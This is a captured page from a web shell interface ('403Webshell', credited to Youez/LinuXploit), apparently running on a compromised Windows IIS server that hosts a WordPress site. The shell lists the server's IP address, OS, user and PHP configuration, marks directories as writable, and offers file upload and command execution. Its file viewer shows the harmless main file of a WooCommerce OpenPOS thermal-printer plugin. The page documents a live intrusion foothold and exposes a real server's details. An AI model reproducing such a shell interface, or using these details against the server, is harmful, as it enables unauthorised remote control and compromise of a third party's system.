403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.217.51
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/CAFE1/wp-content/plugins/woocommerce-openpos-printer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/CAFE1/wp-content/plugins/woocommerce-openpos-printer/index.php
<?php
/*
Plugin Name: Woocommerce + OpenPOS + Thermal Printer 
Plugin URI: http://openswatch.com
Description: This package contains type definitions for W3C Web USB API and Web Bluethooth API. Use for Chrome and Opera browser . Support list device at https://caniuse.com/webusb
Author: anhvnit@gmail.com
Author URI: http://wpos.app/
Version: 1.3
WC requires at least: 2.6
Text Domain: openpos-op-printer
License: GPL version 2 or later - http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
*/
define('OPENPOS_T_OP_PRINTER_DIR',plugin_dir_path(__FILE__));
define('OPENPOS_T_OP_PRINTER_URL',plugins_url('woocommerce-openpos-printer'));
require(OPENPOS_T_OP_PRINTER_DIR.'Printer.php');
require(OPENPOS_T_OP_PRINTER_DIR.'class.thermal.print.php');
if(!function_exists('is_plugin_active'))
{
    include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
}
if(is_plugin_active( 'woocommerce-openpos/woocommerce-openpos.php' ))
{
    global $openpos_op_printer;
    global $openpos_op_thermal_receipt;
    $openpos_op_printer = new Op_Themial_Printer();
    $openpos_op_printer->init();
    
}

Youez - 2016 - github.com/yon3zu
LinuXploit